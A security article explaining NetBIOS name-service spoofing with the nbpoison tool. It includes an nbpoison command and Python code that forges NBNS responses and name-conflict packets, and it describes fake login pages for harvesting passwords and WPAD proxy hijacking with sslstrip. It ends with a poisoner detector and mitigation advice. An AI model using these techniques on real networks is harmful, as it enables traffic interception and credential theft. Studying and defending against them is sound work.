
NetBIOS protocol susceptible to spoofing
A small introduction to the NetBIOS protocol.
When Windows resolves a host name it asks DNS first. Assuming nobody has tampered with the DHCP exchange to hand out a rogue DNS server, and nobody is ARP spoofing to redirect the traffic, the query goes to the configured DNS server, which returns the IP address.
If the DNS query fails (for example the DNS server is unreachable, or the name simply does not exist in DNS), Windows falls back to NetBIOS name resolution (NBNS, the NetBIOS Name Service on UDP port 137). That fallback is what lets you ping SOMEPC by its bare network name: if SOMEPC is up and on the same segment, the name is resolved to its IP address. The interesting part is how it happens: the client sends a broadcast NetBIOS Name Query to the whole subnet, in effect "who owns SOMEPC?", and the machine that registered the name SOMEPC answers "that's me", with its address. (Windows Vista and later also try LLMNR over multicast before NBNS; for the purposes of this article it behaves the same way: anyone on the segment can answer.)
But what prevents an attacker from impersonating SOMEPC (or any other name)?
NBTool
One of the utilities in the NBTool package, nbpoison, listens for broadcast NBNS requests (NetBIOS Name Query packets) on the segment and answers every one of them, whatever name was asked for, with a NetBIOS Name Query Response sent back to the host that asked, substituting its own (or any chosen) IP address for the name. With the -c switch (conflict flag) it also reacts to name registrations: a host that has just booted and is registering its name receives a name conflict message saying that the name is already in use on the network.
i.e. the exchange looks like this:
FREDSBOX: (has just booted and is registering its name on the network) "Hey everyone, for your attention: my name on this network is FREDSBOX."
Attacker: "No, you are mistaken; I am FREDSBOX."
FREDSBOX: "OK, sorry." (From now on FREDSBOX will no longer answer requests addressed to its name.)
So, for example, we want to answer every broadcast NBNS request on the 172.21.49.0/24 segment with our own address 172.21.49.129 and thereby pull all those connections to our machine. To do this, run nbpoison with the following parameters:
sudo ./nbpoison -s 172.21.49.129

In the screenshot we can see that when the nonexistent name NONAMESERVER1 is pinged, the name resolves anyway and the echo replies come from 172.21.49.129, i.e. the address we passed to nbpoison with -s. Another thing to note is that nbpoison must be run as root, because it binds the privileged UDP port 137 (ports below 1024 require root on Linux).
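The broadcast query and the forged answer described above, as an added worked example (not code from the article or from NBTool): a small Python builder and parser for the three RFC 1002 packets involved, the client's NAME QUERY REQUEST, the POSITIVE NAME QUERY RESPONSE that nbpoison -s sends back, and the NAME CONFLICT DEMAND behind -c. The transaction ids, the names NONAMESERVER1 and FREDSBOX and the address 172.21.49.129 are sample values taken from the article's scenario; nothing is put on the wire.

```python
"""
NetBIOS Name Service (RFC 1002) query and poisoned-response builder.

Added illustration, not code from the original article or from NBTool.
It constructs the packets that the nbpoison exchange consists of, so the
exchange can be inspected offline.  The transaction id 0x1234, the name
NONAMESERVER1 and the address 172.21.49.129 are constructed sample values
taken from the article's scenario.
"""
import struct

NB_TYPE = 0x0020                   # question / RR type "NB"
IN_CLASS = 0x0001
FLAGS_QUERY = 0x0110               # request, OPCODE=0 (query), RD=1, B=1 (broadcast)
FLAGS_POSITIVE_RESPONSE = 0x8580   # R=1, OPCODE=0, AA=1, RD=1, RA=1, RCODE=0
FLAGS_NAME_CONFLICT = 0xAD87       # R=1, OPCODE=5 (registration), AA=1, RD=1, RA=1, RCODE=7 (CFT_ERR)
SUFFIX_WORKSTATION = 0x00          # 16th byte of the name: the service type being asked for
SUFFIX_SERVER = 0x20


def encode_name(name, suffix=SUFFIX_SERVER):
    """First-level encoding: 15 chars space-padded plus the suffix byte, each
    byte split into two nibbles written as 'A'..'P', wrapped as one 32-char label."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytearray()
    for b in raw:
        enc += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return bytes([32]) + bytes(enc) + b"\x00"


def decode_name(label):
    """Inverse of encode_name: returns (name, suffix)."""
    if len(label) < 34 or label[0] != 32 or label[33] != 0:
        raise ValueError("not a first-level encoded NetBIOS name")
    enc = label[1:33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_query(trn_id, name, suffix=SUFFIX_SERVER):
    """NAME QUERY REQUEST as a Windows client broadcasts it to UDP/137 (QDCOUNT=1)."""
    header = struct.pack("!HHHHHH", trn_id, FLAGS_QUERY, 1, 0, 0, 0)
    return header + encode_name(name, suffix) + struct.pack("!HH", NB_TYPE, IN_CLASS)


def parse_query(pkt):
    trn_id, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if (flags & 0x8000) or ((flags >> 11) & 0xF) != 0 or qdcount != 1:
        raise ValueError("not a name query request")
    name, suffix = decode_name(pkt[12:46])
    qtype, qclass = struct.unpack("!HH", pkt[46:50])
    return {"trn_id": trn_id, "name": name, "suffix": suffix,
            "qtype": qtype, "broadcast": bool(flags & 0x0010)}


def build_poisoned_response(query, spoof_ip, ttl=165):
    """POSITIVE NAME QUERY RESPONSE that answers whatever name was asked for with
    spoof_ip.  nbpoison -s <ip> unicasts this back to the source address and port
    of the broadcast query; the first answer the client receives wins."""
    q = parse_query(query)
    header = struct.pack("!HHHHHH", q["trn_id"], FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0)
    rr = encode_name(q["name"], q["suffix"]) + struct.pack("!HHIH", NB_TYPE, IN_CLASS, ttl, 6)
    rdata = struct.pack("!H", 0x0000) + bytes(int(o) for o in spoof_ip.split("."))  # NB_FLAGS: unique name, B-node
    return header + rr + rdata


def build_name_conflict(trn_id, name, suffix, claimed_ip):
    """NAME CONFLICT DEMAND (RFC 1002 4.2.3), the packet behind nbpoison -c: tells a
    host that has just registered `name` that the name is already in use.  The
    recipient marks the name as conflicting and stops answering queries for it."""
    header = struct.pack("!HHHHHH", trn_id, FLAGS_NAME_CONFLICT, 0, 1, 0, 0)
    rr = encode_name(name, suffix) + struct.pack("!HHIH", NB_TYPE, IN_CLASS, 0, 6)
    return header + rr + struct.pack("!H", 0x0000) + bytes(int(o) for o in claimed_ip.split("."))


def parse_response(pkt):
    """Decode the fields a victim (or a detector) cares about from any NBNS response."""
    trn_id, flags = struct.unpack("!HH", pkt[:4])
    name, suffix = decode_name(pkt[12:46])
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[46:56])
    ip = ".".join(str(b) for b in pkt[58:62])
    return {"trn_id": trn_id, "opcode": (flags >> 11) & 0xF, "rcode": flags & 0xF,
            "authoritative": bool(flags & 0x0400), "name": name, "suffix": suffix,
            "ttl": ttl, "ip": ip}


if __name__ == "__main__":
    query = build_query(0x1234, "NONAMESERVER1")              # what "ping NONAMESERVER1" broadcasts
    answer = build_poisoned_response(query, "172.21.49.129")  # what nbpoison -s 172.21.49.129 sends back
    print(parse_query(query))
    print(parse_response(answer))
    print(parse_response(build_name_conflict(0x5678, "FREDSBOX", SUFFIX_WORKSTATION, "172.21.49.129")))
```

Run it to print the decoded query and answer. The reason the attack works is visible in the fields: nothing in the response ties it to the real owner of the name, so the client accepts any packet carrying the 16-bit transaction id it just broadcast to the whole segment and takes the first NB_ADDRESS it gets. Sending the response for real is one sendto() of these bytes to the query's source address and port from a socket bound to UDP/137, which is the root requirement mentioned above.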
Now let us look at several kinds of attack in practice.
Imagine that the corporate DNS server has become unavailable for some reason: the uplink of the switch your segment is connected to has been physically unplugged (possibly on purpose), the router or firewall configuration has failed, or the corporate DNS itself has gone down and your whole subnet can no longer reach DNS.
Then, as described above, once DNS resolution fails Windows falls back to NetBIOS name resolution (NetBIOS Name Service), and the first host to answer the broadcast query is believed.
And so, as the screenshot showed, a Linux machine answered the name query and served its own web page in place of the real one. Instead of that page you could present a fake login page of a popular mail service such as Gmail, or of some social network, and log every password entered. Keep in mind that NetBIOS names are at most 15 characters and contain no dots, so Windows does not fall back to NBNS for a fully qualified name such as mail.google.com; the fallback catches the short names users type for intranet hosts, and a victim has to be sent to a public site by some other route, such as the proxy hijack that follows.
The next attack we consider can be used to hijack WPAD requests and harvest confidential corporate user data. It applies when the browser has "Automatically detect settings" (proxy auto-detection) enabled. Both Internet Explorer and Mozilla Firefox support this so that the network administrator can hand out the corporate proxy settings automatically: the browser resolves the name WPAD and fetches a proxy auto-configuration script (wpad.dat) from that host. So by answering the NBNS query for WPAD ourselves, we can hand the victim our own WPAD script, which tells the browser to use our host as its proxy, where sslstrip is listening on port 8080, and then we get to see a great deal of interesting traffic.
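Seen from the defender's side, both the WPAD hijack and the -c name conflict leave distinctive traces on UDP/137. The following is an added example, not code from the article or from NBTool: it audits decoded NBNS records the way a sniffer or IDS rule would, using the article's own trick (pinging a name that does not exist) as a canary. Each record holds the fields such a sniffer would extract from one packet, the SAMPLE traffic is constructed to reproduce the article's scenario with 172.21.49.129 as the poisoner, and the rule thresholds are assumptions to be tuned per segment.

```python
"""
Spotting an NBNS poisoner from decoded name-service traffic.

Added example, not from the original article or from NBTool.  Each record is
the set of fields a sniffer on UDP/137 would extract from one packet:
(source IP, is_response, opcode, rcode, NetBIOS name, answered IP or None).
The SAMPLE traffic is constructed to mirror the article's scenario, in which
172.21.49.129 runs nbpoison -s 172.21.49.129 -c on 172.21.49.0/24.
"""
from collections import defaultdict

OPCODE_QUERY = 0
OPCODE_REGISTRATION = 5
RCODE_CFT_ERR = 7           # "name conflict" result code

# Constructed sample traffic: (src_ip, is_response, opcode, rcode, name, answer_ip)
SAMPLE = [
    ("172.21.49.50", False, OPCODE_QUERY, 0, "FILESRV01", None),                 # client broadcasts a query
    ("172.21.49.10", True, OPCODE_QUERY, 0, "FILESRV01", "172.21.49.10"),        # the real owner answers
    ("172.21.49.129", True, OPCODE_QUERY, 0, "FILESRV01", "172.21.49.129"),      # the poisoner answers too
    ("172.21.49.50", False, OPCODE_QUERY, 0, "NONAMESERVER1", None),             # ping of a nonexistent name
    ("172.21.49.129", True, OPCODE_QUERY, 0, "NONAMESERVER1", "172.21.49.129"),  # ...and it "resolves"
    ("172.21.49.51", False, OPCODE_QUERY, 0, "WPAD", None),                      # browser proxy auto-detect
    ("172.21.49.129", True, OPCODE_QUERY, 0, "WPAD", "172.21.49.129"),           # attacker becomes the proxy
    ("172.21.49.60", False, OPCODE_REGISTRATION, 0, "FREDSBOX", "172.21.49.60"), # FREDSBOX boots and registers
    ("172.21.49.129", True, OPCODE_REGISTRATION, RCODE_CFT_ERR, "FREDSBOX", "172.21.49.129"),  # nbpoison -c
]


def audit(records, canary_names=("NONAMESERVER1",), max_names_per_responder=2):
    """Return (rule, subject, detail) findings.  canary_names are names known not
    to exist on the segment, so anyone answering them is lying.  A legitimate
    B-node only answers for its own few names, so a responder answering many
    different names is almost certainly a poisoner (threshold is an assumption)."""
    findings = []
    answers_by_name = defaultdict(set)     # name -> set of IPs it resolved to
    names_by_responder = defaultdict(set)  # responder IP -> set of names it answered
    canaries = {n.upper() for n in canary_names}
    for src, is_response, opcode, rcode, name, answer in records:
        if not is_response:
            continue
        name = name.upper()
        if opcode == OPCODE_REGISTRATION and rcode == RCODE_CFT_ERR:
            findings.append(("name_conflict_demand", src, name))
            continue
        if opcode != OPCODE_QUERY or rcode != 0 or answer is None:
            continue
        if name in canaries:
            findings.append(("canary_answered", src, name))
        if name == "WPAD":   # WPAD should come from DNS or DHCP; an NBNS answer is a proxy hijack
            findings.append(("wpad_via_nbns", src, name))
        answers_by_name[name].add(answer)
        names_by_responder[src].add(name)
    for name, ips in sorted(answers_by_name.items()):
        if len(ips) > 1:
            findings.append(("conflicting_answers", name, sorted(ips)))
    for src, names in sorted(names_by_responder.items()):
        if len(names) > max_names_per_responder:
            findings.append(("answers_many_names", src, sorted(names)))
    return findings


def suspected_poisoners(findings, min_rules=2):
    """Responder addresses implicated by at least min_rules different rules."""
    rules_by_src = defaultdict(set)
    for rule, subject, _ in findings:
        if rule in ("canary_answered", "wpad_via_nbns", "name_conflict_demand", "answers_many_names"):
            rules_by_src[subject].add(rule)
    return sorted(src for src, rules in rules_by_src.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
    print("suspected poisoners:", suspected_poisoners(audit(SAMPLE)))
```

The canary rule is the article's own ping NONAMESERVER1 test in automated form: pick a name that cannot exist, query it periodically, and alert on any answer at all. The cure is to take the fallback away rather than to hunt poisoners: disable NetBIOS over TCP/IP (and LLMNR) on hosts that do not need it, and either give WPAD an explicit DNS entry or switch proxy auto-detection off, so that no browser ever broadcasts for it.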